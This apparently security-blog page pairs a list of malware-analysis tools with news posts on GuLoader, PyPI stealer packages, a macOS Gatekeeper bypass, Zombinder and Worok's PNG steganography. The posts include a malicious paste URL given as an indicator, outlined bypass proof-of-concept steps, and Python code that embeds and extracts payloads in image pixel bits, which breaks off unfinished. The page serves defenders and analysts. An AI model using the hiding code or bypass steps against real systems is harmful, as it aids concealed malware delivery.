  • x64dbg – An open-source x64/x32 debugger for Windows.

Binary Format and  Binary Analysis

The Compound File Binary Format is the basic container used by several different Microsoft file formats such as Microsoft Office documents and Microsoft Installer packages.

Binary Analysis Resources


Decompiler 

A decompiler is a computer program that takes an executable file as input and attempts to create a high-level source file which can be recompiled successfully. It is therefore the opposite of a compiler, which takes a source file and makes an executable.

Generic Decompiler

Java Decompiler

.NET Decompiler

Delphi Decompiler

Python Decompiler

Bytecode Analysis

Bytecode Analysis Tools

Malware Analysis Tools for Reconstruction

Import Reconstruction Tools

Online Scanners and Sandboxes

  • AndroTotal – Free online analysis of APKs against multiple mobile antivirus apps.
  • AVCaesar – Malware.lu online scanner and malware repository.
  • Cryptam – Analyze suspicious office documents.
  • Cuckoo Sandbox – Open source, self hosted sandbox and automated analysis system.
  • cuckoo-modified – Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author.
  • cuckoo-modified-api – A Python API used to control a cuckoo-modified sandbox.
  • DeepViz – Multi-format file analyzer with machine-learning classification.
  • detux – A sandbox developed to do traffic analysis of Linux malware and capture IOCs.
  • DRAKVUF – Dynamic malware analysis system.
  • firmware.re – Unpacks, scans and analyzes almost any firmware package.
  • HaboMalHunter – An Automated Malware Analysis Tool for Linux ELF Files.
  • Hybrid Analysis – Online malware analysis tool, powered by VxSandbox.
  • IRMA – An asynchronous and customizable analysis platform for suspicious files.
  • Joe Sandbox – Deep malware analysis with Joe Sandbox.
  • Jotti – Free online multi-AV scanner.
  • Limon – Sandbox for Analyzing Linux Malware.
  • Malheur – Automatic sandboxed analysis of malware behavior.
  • malsub – A Python RESTful API framework for online malware and URL analysis services.
  • Malware config – Extract, decode and display online the configuration settings from common malware.
  • Malwr – Free analysis with an online Cuckoo Sandbox instance.
  • MASTIFF Online – Online static analysis of malware.
  • Metadefender.com – Scan a file, hash or IP address for malware (free).
  • NetworkTotal – A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro.
  • Noriben – Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
  • PDF Examiner – Analyse suspicious PDF files.
  • ProcDot – A graphical malware analysis tool kit.
  • Recomposer – A helper script for safely uploading binaries to sandbox sites.
  • Sand droid – Automatic and complete Android application analysis system.
  • SEE – Sandboxed Execution Environment (SEE) is a framework for building test automation in secured environments.
  • VirusTotal – Free online analysis of malware samples and URLs.
  • Visualize_Logs – Open source visualization library and command line tools for logs (Cuckoo, Procmon, more to come).
  • Zeltser’s List – Free automated sandboxes and services, compiled by Lenny Zeltser.

Document Analysis

Document Analysis Tools

Scripting

Scripting

Android

Android tools

Yara

Yara Resources

Memory Forensics Malware Analysis Tools 

Tools for dissecting malware in memory images or running systems.

  • BlackLight – Windows/MacOS forensics client supporting hiberfil, pagefile, raw memory analysis.
  • DAMM – Differential Analysis of Malware in Memory, built on Volatility.
  • evolve – Web interface for the Volatility Memory Forensics Framework.
  • FindAES – Find AES encryption keys in memory.
  • inVtero.net – High speed memory analysis framework developed in .NET; supports all Windows x64, includes code integrity and write support.
  • Muninn – A script to automate portions of analysis using Volatility, and create a readable report.
  • Rekall – Memory analysis framework, forked from Volatility in 2013.
  • TotalRecall – Script based on Volatility for automating various malware analysis tasks.
  • VolDiff – Run Volatility on memory images before and after malware execution, and report changes.
  • Volatility – Advanced memory forensics framework.
  • VolUtility – Web Interface for Volatility Memory Analysis framework.
  • WDBGARK – WinDBG Anti-RootKit Extension.
  • WinDbg – Live memory inspection and kernel debugging for Windows systems.

Windows Artifacts

  • AChoir – A live incident response script for gathering Windows artifacts.
  • python-evt – Python library for parsing Windows Event Logs.
  • python-registry – Python library for parsing registry files.
  • RegRipper (GitHub) – Plugin-based registry analysis tool.

Storage and Workflow

  • Aleph – Open Source Malware Analysis Pipeline System.
  • CRITs – Collaborative Research Into Threats, a malware and threat repository.
  • FAME – A malware analysis framework featuring a pipeline that can be extended with custom modules, which can be chained and interact with each other to perform end-to-end analysis.
  • Malwarehouse – Store, tag, and search malware.
  • Polichombr – A malware analysis platform designed to help analysts reverse malware collaboratively.
  • stoQ – Distributed content analysis framework with extensive plugin support, from input to output, and everything in between.
  • Viper – A binary management and analysis framework for analysts and researchers.

Malware samples

Malware samples collected for analysis.

  • Clean MX – Realtime database of malware and malicious domains.
  • Contagio – A collection of recent malware samples and analyses.
  • Exploit Database – Exploit and shellcode samples.
  • Malshare – Large repository of malware actively scraped from malicious sites.
  • MalwareDB – Malware samples repository.
  • Open Malware Project – Sample information and downloads. Formerly Offensive Computing.
  • Ragpicker – Plugin based malware crawler with pre-analysis and reporting functionalities.
  • theZoo – Live malware samples for analysts.
  • Tracker h3x – Aggregator for malware corpus trackers and malicious download sites.
  • ViruSign – Malware database of samples detected by many anti-malware programs except ClamAV.
  • VirusShare – Malware repository, registration required.
  • VX Vault – Active collection of malware samples.
  • Zeltser’s Sources – A list of malware sample sources put together by Lenny Zeltser.
  • Zeus Source Code – Source for the Zeus trojan leaked in 2011.

Domain Malware Analysis Tools

Inspect domains and IP addresses.

  • badips.com – Community based IP blacklist service.
  • boomerang – A tool designed for consistent and safe capture of off network web resources.
  • Cymon – Threat intelligence tracker, with IP/domain/hash search.
  • Desenmascara.me – One click tool to retrieve as much metadata as possible for a website and to assess its good standing.
  • Dig – Free online dig and other network tools.
  • dnstwist – Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
  • IPinfo – Gather information about an IP or domain by searching online resources.
  • Machinae – OSINT tool for gathering information about URLs, IPs, or hashes. Similar to Automater.
  • mailchecker – Cross-language temporary email detection library.
  • MaltegoVT – Maltego transform for the VirusTotal API. Allows domain/IP research, and searching for file hashes and scan reports.
  • Multi rbl – Multiple DNS blacklist and forward confirmed reverse DNS lookup over more than 300 RBLs.
  • NormShield Services – Free API Services for detecting possible phishing domains, blacklisted IP addresses and breached accounts.
  • SpamCop – IP based spam block list.
  • SpamHaus – Block list based on domains and IPs.
  • Sucuri SiteCheck – Free Website Malware and Security Scanner.
  • Talos Intelligence – Search for IP, domain or network owner. (Previously SenderBase.)
  • TekDefense Automater – OSINT tool for gathering information about URLs, IPs, or hashes.
  • URLQuery – Free URL Scanner.
  • Whois – DomainTools free online whois search.
  • Zeltser’s List – Free online tools for researching malicious websites, compiled by Lenny Zeltser.
  • Zscaler Zulu – Zulu URL Risk Analyzer.

Books 

The most important reverse engineering books.

Documents and Shellcode

Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section.

  • AnalyzePDF – A tool for analyzing PDFs and attempting to determine whether they are malicious.
  • box-js – A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation.
  • diStorm – Disassembler for analyzing malicious shellcode.
  • JS Beautifier – JavaScript unpacking and deobfuscation.
  • JS Deobfuscator – Deobfuscate simple Javascript that uses eval or document.write to conceal its code.
  • libemu – Library and tools for x86 shellcode emulation.
  • malpdfobj – Deconstruct malicious PDFs into a JSON representation.
  • OfficeMalScanner – Scan for malicious traces in MS Office documents.
  • olevba – A script for parsing OLE and OpenXML documents and extracting useful information.
  • Origami PDF – A tool for analyzing malicious PDFs, and more.
  • PDF Tools – pdfid, pdf-parser, and more from Didier Stevens.
  • PDF X-Ray Lite – A PDF analysis tool, the backend-free version of PDF X-RAY.
  • peepdf – Python tool for exploring possibly malicious PDFs.
  • QuickSand – QuickSand is a compact C framework to analyze suspected malware documents to identify exploits in streams of different encodings and to locate and extract embedded executables.
  • Spidermonkey – Mozilla’s JavaScript engine, for debugging malicious JS.

Practice Malware Analysis Tools 

Practice Reverse Engineering. Be careful with malware.

Open Source Threat Intelligence Tool

Harvest and analyze IOCs.

  • AbuseHelper – An open-source framework for receiving and redistributing abuse feeds and threat intel.
  • AlienVault Open Threat Exchange – Share and collaborate in developing threat intelligence.
  • Combine – Tool to gather threat intelligence indicators from publicly available sources.
  • Fileintel – Pull intelligence per file hash.
  • Hostintel – Pull intelligence per host.
  • IntelMQ – A tool for CERTs for processing incident data using a message queue.
  • IOC Editor – A free editor for XML IOC files.
  • ioc_writer – Python library for working with OpenIOC objects, from Mandiant.
  • Massive Octo Spice – Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the CSIRT Gadgets Foundation.
  • MISP – Malware Information Sharing Platform curated by The MISP Project.
  • Pulsedive – Free, community-driven threat intelligence platform collecting IOCs from open-source feeds.
  • PyIOCe – A Python OpenIOC editor.
  • RiskIQ – Research, connect, tag and share IPs and domains. (Was PassiveTotal.)
  • threataggregator – Aggregates security threats from a number of sources, including some of those listed below in other resources.
  • ThreatCrowd – A search engine for threats, with graphical visualization.
  • ThreatTracker – A Python script to monitor and generate alerts based on IOCs indexed by a set of Google Custom Search Engines.
  • TIQ-test – Data visualization and statistical analysis of threat intelligence feeds.

Other Resources

Credits

This list was created with the help of the following awesome people.

Infosec books | InfoSec tools | InfoSec services

Tags: malware analysis tools


Dec 29 2022

GuLoader Malware Uses Advanced Anti-Analysis Techniques to Evade Detection

Category: Antivirus, Malware, Threat detection | DISC @ 11:30 am

An advanced malware downloader named GuLoader has recently been exposed by cybersecurity researchers at CrowdStrike. This advanced downloader has the capability to evade the detection of security software by adopting a variety of techniques.

While analyzing GuLoader’s shellcode, CrowdStrike discovered a brand-new anti-analysis technique: the malware scans the entire process memory for VM-related strings to determine whether it is running in an adversarial (analysis) environment.

Evolution of GuLoader Malware

On infected machines, GuLoader (aka CloudEyE) uses a VBS downloader to distribute remote access trojans such as Agent Tesla, FormBook, NanoCore, NETWIRE, Remcos, and the Parallax RAT.

GuLoader has been active since at least 2019 and has undergone several changes in its functionality and delivery methods. Over time, the malware has become more sophisticated, using various methods to evade detection and avoid being removed from infected systems. 

It has also been distributed through other channels, such as exploit kits and hacked websites, and has been used in various campaigns to deliver a range of malware, including ransomware, banking Trojans, and other types of malware.

GuLoader also deploys strong anti-analysis techniques in order to remain undetected.

GuLoader uses a three-stage process: the VBScript first injects the shellcode embedded within it into memory, and the next stage then executes anti-analysis checks that protect the code from being analyzed.

Furthermore, the shellcode also incorporates the same anti-analysis methods in order to avoid detection by third parties. It is through this shellcode that an attacker is able to download a final payload of their choice and execute it with the same anti-analysis methods as the original shellcode on the host that is compromised.

The malware uses anti-debugging and anti-disassembling checks to detect breakpoints placed for code analysis.

There is also a redundant code injection mechanism that avoids the NTDLL.dll hooks commonly used by antivirus programs and EDRs.

In order to detect and flag processes on Windows that may be suspicious, anti-malware engines use NTDLL.dll API hooking. 

Anti-Analysis Techniques

Here below we have mentioned the anti-analysis techniques used:-

  • Anti-Debugging
  • Anti-Virtual Machine
  • Process Hollowing

It was pointed out by experts that GuLoader remains a treacherous threat that is constantly evolving as it continues to develop. Furthermore, experts also provided indicators of compromise for the latest version of the downloader, as well as other key information.

GuLoader Malware Advanced Anti-Analysis

Antivirus Bypass Techniques: Learn practical techniques and tactics to combat, bypass, and evade antivirus software

Malware Analysis


Tags: Antivirus Bypass Techniques, Evade Detection, Malware


Dec 27 2022

Hackers Deploy New Information Stealer Malware onto Python Developers’ Machines

Category: Malware, Python | DISC @ 10:48 am

Researchers at Phylum recently discovered that hackers had been injecting information stealer malware into Python developers’ machines in order to steal their information.

As they dug deeper, they discovered a new stealer variant circulating under many different names. Its source code reveals that it is a straightforward copy of the older W4SP stealer.

Attack Chain to Deploy Malware

In this case the stealer was dropped directly into the package’s main.py file, with no obfuscation and no real attempt to escape detection.

Only one instance has been found in which multiple stages were used in order to obfuscate and obscure the attacker’s intentions. In this case, the attacker used a package called chazz to pull obfuscated code from the klgrth.io website, using a simple first stage to get it.

The first stage of the stealer code closely resembles the injector code. It has been obfuscated with BlankOBF, an obfuscation program; once de-obfuscated, it reveals the Leaf $tealer.

Malicious Packages

Listed below are packages that feature similar IOCs; this list can be expected to grow over the coming months and years:-

  • modulesecurity – “Celestial Stealer”
  • informmodule – “Leaf $tealer”
  • chazz – first stage that pulls from https://www.klgrth.io/paste/j2yvv/raw, which contains the obfuscated code shown above
  • randomtime – “ANGEL stealer”
  • proxygeneratorbil – “@skid STEALER”
  • easycordey – “@skid Stealer”
  • easycordeyy – “@skid Stealer”
  • tomproxies – “@skid STEALER”
  • sys-ej – “Hyperion Obfuscated code”
  • infosys – “@734 Stealer”
  • sysuptoer – “BulkFA Stealer”
  • nowsys – “ANGEL Stealer”
  • upamonkws – “PURE Stealer”
  • captchaboy – “@skid STEALER”
  • proxybooster – “Fade Stealer”

W4SP Copies

W4SP’s original publication in loTus’s repository has been disabled by GitHub staff for violating GitHub’s terms and conditions, so it can no longer be found there.

It has been Phylum’s mission for some time to monitor the actions of these threat actors in an attempt to finally bring down their infrastructure, due to their persistent, pervasive, and egregious nature.

Several copies of W4SP-Stealer appeared under different names as soon as the W4SP-Stealer repo was removed. Threat actors are already distributing this new stealer through PyPI, a sign that it is becoming a real threat.

It has been discovered that W4SP has been hosted in two GitHub repositories under two different aliases, each with its own purpose.

  • Satan Stealer
  • angel-stealer

There is a copy of the original source here, as well as the earlier versions of W4SP, hosted in an account titled aceeontop. 

W4SP Stealer will likely remain part of the scene for quite some time to come, as will their imitations and other variants.

Their number of attempts, their persistence, and their sophistication will keep increasing over time. Phylum states that its platform is capable of mitigating and blocking such supply chain attacks.

Malware Analysis and Detection Engineering: A Comprehensive Approach to Detect and Analyze Modern Malware

Tags: Information Stealer Malware


Dec 21 2022

VirusTotal INTELLIGENCE CHEAT SHEET

Category: Antivirus, Cheat Sheet, Malware | DISC @ 9:21 am

VirusTotal cheat sheet makes it easy to search for specific results

Opening the Blackbox of VirusTotal, analyzing online phishing scan engines

The Antivirus Hacker’s Handbook

Mastering Malware Analysis


Tags: VirusTotal, VirusTotal INTELLIGENCE CHEAT SHEET


Dec 20 2022

Microsoft shares details for a Gatekeeper Bypass bug in Apple macOS

Category: Bug Bounty, Malware | DISC @ 11:02 am

Microsoft disclosed technical details of a vulnerability in Apple macOS that could be exploited by an attacker to bypass Gatekeeper.

Microsoft has disclosed details of a now-fixed security vulnerability dubbed Achilles (CVE-2022-42821, CVSS score: 5.5) in Apple macOS that could be exploited by threat actors to bypass the Gatekeeper security feature.

Apple’s Gatekeeper is designed to protect OS X users by performing a number of checks before allowing an app to run. In practice, you cannot execute code that wasn’t signed by an Apple developer, and you cannot run apps that weren’t downloaded from Apple’s store, unless of course the device is jailbroken.

The flaw was discovered on July 27, 2022, by Jonathan Bar Or from Microsoft, it is a logic issue that was addressed with improved checks.

“On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple’s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call “Achilles”.” reads the post published by Microsoft.

Microsoft researchers explained that Gatekeeper bypasses can be used by threat actors to install malware on macOS systems.

The experts pointed out that Apple’s Lockdown Mode introduced in July does not prevent the exploitation of the Achilles bug.

The Achilles vulnerability relies on the Access Control Lists (ACLs) permission model to add extremely restrictive permissions to a downloaded file (i.e., “everyone deny write, writeattr, writeextattr, writesecurity, chown”), to block the Safari browser from setting the quarantine extended attribute.

Below is the POC developed by Microsoft:

  1. Create a fake directory structure with an arbitrary icon and payload.
  2. Create an AppleDouble file with the com.apple.acl.text extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of “everyone deny write,writeattr,writeextattr,writesecurity,chown”). Perform the correct AppleDouble patching if using ditto to generate the AppleDouble file.
  3. Create an archive with the application alongside its AppleDouble file and host it on a web server.

A video PoC is available here.

Tags: Gatekeeper Bypass bug


Dec 12 2022

95.6% of New Malware in 2022 Targeted Windows

Category: Malware, Windows Security | DISC @ 11:06 am

Malware attacks are a growing problem in our increasingly digital world. By infiltrating computers and networks, malicious software can cause serious harm to those affected by it.

One of the most common types of malware is ransomware (encryption-based malware), which prevents users from accessing their files until they pay a hefty fee to the cyber attacker. This type of attack has been used to target everything from individuals to large organizations, including government agencies and healthcare providers.

In addition to financial losses, malware attacks can have devastating effects on businesses and individuals. In some cases, sensitive data can be stolen or destroyed as part of an attack. This can lead to identity theft and other forms of fraud, as well as put organizations at risk for long-term damage if confidential information is exposed or compromised.

Research Findings

A recent study by Atlas VPN shows how malware infection is on the rise and the trends in the new malware samples found in the first three quarters of 2022. 

According to researchers, 59.58 million samples of new Windows malware were found in the first three quarters of 2022 and these make up 95.6% of all new malware discovered during that time period. 

This analysis was based on data by AV-TEST GmbH, an independent organization that evaluates and rates antivirus and supplies services in IT Security and Antivirus Research. The study also includes new malware samples detected in the four quarters of 2021 and the first three quarters of 2022. 

Windows, Linux, and Android Malware

Overall, the data shows a downward trend: the number of malware samples this year decreased by 34% compared to the same period last year. However, the numbers are still exceptionally high.

Following Windows on the list is Linux malware with 1.76 million new malware samples – 2.8% of the total malware threats in 2022. 

Android malware takes third place with the first three quarters of 2022 seeing 938,379 new Android malware threats, constituting 1.5% of the total new malware. 

Lastly, 8,329 samples of never before seen malware threats aimed at macOS were observed in the same period. 

Total Number of Malware

The study also shows that the total number of malware threats found in the first three quarters of 2022 across all operating systems amounts to 62.29 million. This is about 228,164 malware threats daily. 

In a quarter-by-quarter comparison, the first quarter of 2022 saw the largest number of malware samples – 22.35 million. This number dropped by 4% to 21.49 million in the second quarter of the year, and decreased by another 14% to 18.45 million in the third quarter. 

The numbers continue to plummet into the fourth quarter of the year with 7.62 million new threats found in October and November – nearly 60% less than at the same time last year. 

Protection Against Malware

Malware is a pervasive threat to internet users on both personal and professional networks. It can cause serious damage to computers, networks, and data that can be expensive to fix. Fortunately, there are steps you can take to protect yourself from malware.

The most important step in protecting your network from malware is keeping your anti-malware software up to date. Regularly updating anti-malware programs ensures that they’re able to detect the latest threats and keep them away from your computer or network.

Additionally, be sure not to click on suspicious links or download files from unknown sources as these could contain malicious code that could harm your system.

Another way to stay safe online is by using a secure web browser with built-in security features like pop-up blockers, phishing protection, and ad blockers ((don’t use it on Hackread.com though :0)) for enhanced protection against malicious activities.

95.6% of New Malware in 2022 Targeted Windows

Learning Malware Analysis: Explore the concepts, tools, and techniques to analyze and investigate Windows malware

Tags: Malware, Malware Analysis


Dec 09 2022

Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps

Category: Hacking, Malware | DISC @ 1:44 pm

ThreatFabric’s security researchers have reported a new dark web platform through which cybercriminals can easily add malware to legitimate Android applications.

Dubbed Zombinder, this platform was detected while investigating a campaign in which scammers were distributing multiple kinds of Windows and Android malware, including Android banking malware like Ermac, Laplas “clipper,” Erbium, and the Aurora stealer, etc.

This comes just days after a new dark web marketplace called InTheBox surfaced online, serving smartphone malware developers and operators.

Further probe helped researchers trace the adversary to a third-party dark web service provider called Zombinder. It was identified as an app programming interface binding service launched in March 2022.


According to ThreatFabric’s blog post, numerous different threat actors are using this service and advertising it on hacker forums. On one such forum, the service was promoted as a universal binder that binds malware with almost any legitimate app.

The campaign is designed to look as if it helps users get internet access by imitating a WiFi authorization portal. In reality, it pushes several different malware strains.

What does Zombinder Do?

In the campaign detected by ThreatFabric’s researchers, the service is distributing the Xenomorph banking malware disguised as the VidMate app. It is distributed via modified apps advertised/downloaded from a malicious website mimicking the application’s original website. The victim is lured to visit this site via malicious ads.

The Zombinder-infected app works just as it is marketed while the malicious activity carries on in the background and the victim stays unaware of the malware infection.


At the moment, Zombinder is focusing entirely on Android apps but the service operators are offering Windows apps binding services. Those who downloaded the infected Windows app were delivered the Erbium stealer as well. It is an infamous Windows malware distributed to steal stored passwords, cookies, credit card details, and cryptocurrency wallet data.

It is worth noting that the malicious website’s landing page has two download buttons, one for Windows and the other for Android. When a user clicks the Download for Windows button, they are delivered malware designed for Microsoft’s operating system, including Aurora, Erbium, and the Laplas clipper. Conversely, the Download for Android button distributes the Ermac malware.

How to Stay Protected?

If you want to stay safe, do not sideload apps even if you are desperate to make a specific product work. Also, avoid installing apps from unauthentic or unknown sources onto your Android mobile phone and rely on legitimate sources such as Google Play Store, Amazon Appstore, or Samsung Galaxy Store. Always check the app’s rating, and reviews, and check out the app developers’ website before installing a new app.

Cyber Deep Web

Tags: Cyber Deep Web, dark net, dark web, Zombinder


Dec 01 2022

The CHRISTMA EXEC network worm – 35 years and counting!

Category: Malware | DISC @ 11:32 am

Forget Sergeant Pepper and his Lonely Hearts Club Band, who taught the band to play a mere 20 years ago today.

December 2022 sees the 35th anniversary of the first major self-spreading computer virus – the infamous CHRISTMA EXEC worm that temporarily crushed the major mainframe networks of the day, not by any deliberately coded side-effects such as file scrambling or data deletion, but simply by leeching too much network bandwidth for its own unauthorised purpose.

As a decoy to disguise the fact that it read in the 1980s IBM equivalents of your email address book (NAMES) and your known-hosts file (NETLOG) in order to find as many new recipients of the malware as possible to send itself to, the malware displayed this:

                *               
                *               
               ***              
              *****             
             *******            
            *********           
          *************                A
             *******            
           ***********                VERY
         ***************        
       *******************           HAPPY
           ***********          
         ***************            CHRISTMAS
       *******************      
     ***********************         AND MY
         ***************        
       *******************         BEST WISHES
     ***********************    
   ***************************     FOR THE NEXT
             ******             
             ******                    YEAR
             ******

If you’re wondering why the virus is widely known as CHRISTMA EXEC, rather than by the full word CHRISTMAS, that’s because filenames were limited to eight characters, which could be followed by a space and what we would today call an “extension” of EXEC in order to turn them into scripts that could be run directly by the user – executed, in technical jargon.

The virus itself was written in IBM’s powerful text-based scripting language REXX (the resoundingly named Restructured Extended Executor), so a non-programmer looking at the message would probably recognise it as “program code”, and therefore tend to ignore it as unimportant and irrelevant, for all that it might look interesting.

Except that the author of the virus found a cheerful way to embed an instructional lure right into the code itself, which starts with a remark (as in the C language, text between /* and */ in REXX programs is treated as a comment and ignored when the file gets used)


/*********************/
/*    LET THIS EXEC  */
/*                   */
/*        RUN        */
/*                   */
/*        AND        */
/*                   */
/*       ENJOY       */
/*                   */
/*     YOURSELF!     */
/*********************/


and then offers the following cheery advice to non-techies:

/*  browsing this file is no fun at all
       just type CHRISTMAS from cms     */

CMS is short for Conversational Monitor System, a command prompt environment on top of IBM’s venerable VM/370 operating system and its many variants, which offered individual users a real-time virtual machine that behaved like a computer all of their own, with its own disk space for storing personal files and programs.

Handily, the user didn’t have to be taught to leave the final -S off the word CHRISTMAS, because CMS would automatically ignore any extra characters and hunt for CHRISTMA EXEC, which was the very script program that the user had just received without expecting it or asking for it.

As stated above, the code did indeed display the Christmas Tree ASCII art – or, more precisely, EBCDIC art, given that IBM famously had its own character encoding system known as Extended Binary Coded Decimal Interchange Code (pronounced ebb-si-dick).

But it also trawled through your NAMES and NETLOG files, which listed other users and computers you regularly contacted, and copied itself to all of them, so that for every user who innocently typed CHRISTMAS at the command prompt, a sea of copies of the virus (20? 50? 200?) would be distributed, potentially worldwide, and if any of those recipients (20? 50? 200?) innocently typed CHRISTMAS at the command prompt, a sea of copies of the virus would be distributed, and so on, and so on.

Shades of the future

As we said in this week’s podcast, where we discussed this seminal worm:

[This is j]ust like modern macro malware that says to the user, “Hey, macros are disabled, but for your ‘extra safety’ you need to turn them back on… why not click the button? It’s much easier that way.”

35 years ago, malware writers had already figured out that if you ask users nicely to do something that is not at all in their interest, some of them, possibly many of them, will do it.

Detection of Network Worm to Eliminate Security Threats in MANET: Wormhole Attack and its Challenges

Tags: CHRISTMA EXEC network worm


Nov 21 2022

Chinese Hackers Using 42,000 Phishing Domains To Drop Malware On Victims Systems

Category: Hacking, Malware, Phishing | DISC @ 11:13 am

An extensive phishing campaign targeting businesses in numerous upright markets, including retail, was discovered by Cyjax recently in which the attackers exploited the reputation…

China’s Playbook – new Art of War

War Without Rules: China's Playbook for Global Domination

Tags: Art of war, China's Playbook, Chinese hackers


Nov 16 2022

Massive Black Hat Malware Infect 2500 Websites By Injecting Malicious JavaScript

Category: Malware | DISC @ 10:17 am

Recently, the cybersecurity researchers of Sucuri found that threat actors are conducting a massive black hat search engine optimization (SEO) campaign. 

Nearly 15,000 websites in this campaign redirected visitors to fake Q&A discussion forums. Over the course of September and October, Sucuri’s SiteCheck scanner detected over 2,500 redirects to other sites.

The experts also stated that each compromised site contains nearly 20,000 infected files, all used as part of the malicious campaign, and that most of the sites were running WordPress.

Malicious ois[.]is Redirects

According to the Sucuri report, after detecting the malware the experts conducted a brief survey and found that website malware infections generally limit themselves to a smaller number of files.

They also keep their footprint small so that they can avoid detection and carry out their operations undisturbed. 

A website infected with this malware, by contrast, has on average over 100 infected files, which is what sets it apart from other infections.

Common Infected Files

This malware is most commonly found infecting core files of WordPress, and it has also been found to infect “.php” files that were created by unrelated malware campaigns.

The following is a list of the top 10 most commonly infected files:-

  • ./wp-signup.php
  • ./wp-cron.php
  • ./wp-links-opml.php
  • ./wp-settings.php
  • ./wp-comments-post.php
  • ./wp-mail.php
  • ./xmlrpc.php
  • ./wp-activate.php
  • ./wp-trackback.php
  • ./wp-blog-header.php

Domains Targeted

Tags: Malicious JavaScript


Nov 15 2022

Hackers Hiding Malware Behind The PNG Images Using Steganography

Category: Hacking, Malware | DISC @ 10:03 am

The Worok threat actor infects victims’ computers with information-stealing malware by concealing it within PNG images using steganography, which makes it very difficult for malware scanners to detect.

The finding substantiates one of the most crucial links in the threat actor’s infection chain, according to the experts at Avast. Threat actors use these malicious PNG images to conceal, under the guise of an ordinary image, a payload that facilitates information theft.

In the past couple of months, ESET has been revealing details of attacks that Worok has been launching against several high-profile companies and local government agencies in the following regions:-

  • Middle East
  • Southeast Asia
  • South Africa

There are tactical overlaps between Worok and a Chinese threat actor known as TA428 that is believed to be sharing similar tactics.

Compromise Chain

Worok’s compromise chain uses steganography, a technique that hides scripts within PNG images, and begins with a C++-based loader known as “CLRLoad.”

As of right now, we do not know what vector was used in the initial attack. As part of certain intrusions, the malware was also deployed on Microsoft Exchange Server by exploiting the ProxyShell vulnerability.

A custom malicious kit was then deployed by the attackers using publicly available exploit tools that were available for free. Therefore, the final compromise chain can be summarized as follows:- 

First, CLRLoader runs; its simple code loads PNGLoader, the second stage in the process.

PNGLoad, which decodes the malicious code hidden within the image, comes in two different variants, each launching one of the following payloads:-

  • PowerShell script 
  • .NET C#-based

The PowerShell script has been difficult to obtain. The researchers have recently discovered a new malware called DropboxControl, spyware that steals information from the system and provides the threat actor with the ability to upload, download, and run commands contained in specific files.

Malware in PNG Files

When the image is opened in an image viewer, it looks like a normal picture; the steganographic code inside it is not visible.

The image was encoded using a technique known as “least significant bit” (LSB) encoding, which embeds the malicious code in the least significant bits of each pixel in the image.
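To make the LSB encoding concrete, here is an added example (written for this page, not Worok’s or Avast’s code) that builds a small PNG, hides a constructed payload one bit per colour channel, and then runs the extraction and triage checks an analyst would apply to a suspect image. The channel order, the 4-byte length prefix and the 64x64 RGB layout are assumptions for illustration; the page does not describe Worok’s actual layout.

```python
"""LSB steganography in a PNG, plus extraction and triage for a suspect file.
Added example; assumptions: 8-bit RGB PNG, one payload bit per colour channel
in row-major order, 4-byte big-endian length prefix before the payload."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
WIDTH, HEIGHT = 64, 64


def _chunk(kind: bytes, body: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(kind + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + kind + body + struct.pack(">I", crc)


def write_png(width: int, height: int, rgb: bytes) -> bytes:
    """Encode raw 8-bit RGB samples as a PNG using filter type 0 on every row."""
    if len(rgb) != width * height * 3:
        raise ValueError("rgb buffer does not match dimensions")
    stride = width * 3
    rows = b"".join(b"\x00" + rgb[y * stride:(y + 1) * stride] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(rows)) + _chunk(b"IEND", b"")


def read_png(data: bytes):
    """Parse an 8-bit RGB PNG whose rows use filter type 0 (what write_png emits).
    Returns (width, height, rgb); other colour types or filters raise."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG file")
    pos, width, height, idat = 8, 0, 0, b""
    while pos + 8 <= len(data):
        length, kind = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if kind == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if (depth, ctype) != (8, 2):
                raise ValueError("only 8-bit RGB is handled in this demo")
        elif kind == b"IDAT":
            idat += body  # image data may be split across several IDAT chunks
        elif kind == b"IEND":
            break
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC
    raw, stride, rgb = zlib.decompress(idat), width * 3, bytearray()
    for y in range(height):
        row = raw[y * (stride + 1):(y + 1) * (stride + 1)]
        if row[0] != 0:
            raise ValueError("filtered scanlines not handled in this demo")
        rgb += row[1:]
    return width, height, bytes(rgb)


def embed_lsb(rgb: bytes, payload: bytes) -> bytes:
    """Overwrite the LSB of successive channel bytes with the length-prefixed
    payload. Each channel changes by at most 1, so the picture looks unchanged."""
    blob = struct.pack(">I", len(payload)) + payload
    if len(blob) * 8 > len(rgb):
        raise ValueError("payload too large for this image")
    out = bytearray(rgb)
    for i, byte in enumerate(blob):
        for bit in range(8):
            idx = i * 8 + bit
            out[idx] = (out[idx] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return bytes(out)


def _lsb_bytes(rgb: bytes, count: int, offset: int = 0) -> bytes:
    """Reassemble `count` bytes from the LSBs starting at channel index `offset`."""
    out = bytearray()
    for i in range(count):
        value = 0
        for bit in range(8):
            value = (value << 1) | (rgb[offset + i * 8 + bit] & 1)
        out.append(value)
    return bytes(out)


def extract_lsb(rgb: bytes) -> bytes:
    """Recover a payload written by embed_lsb; raises if the prefix is implausible."""
    (n,) = struct.unpack(">I", _lsb_bytes(rgb, 4))
    if 32 + n * 8 > len(rgb):
        raise ValueError("length prefix exceeds image capacity")
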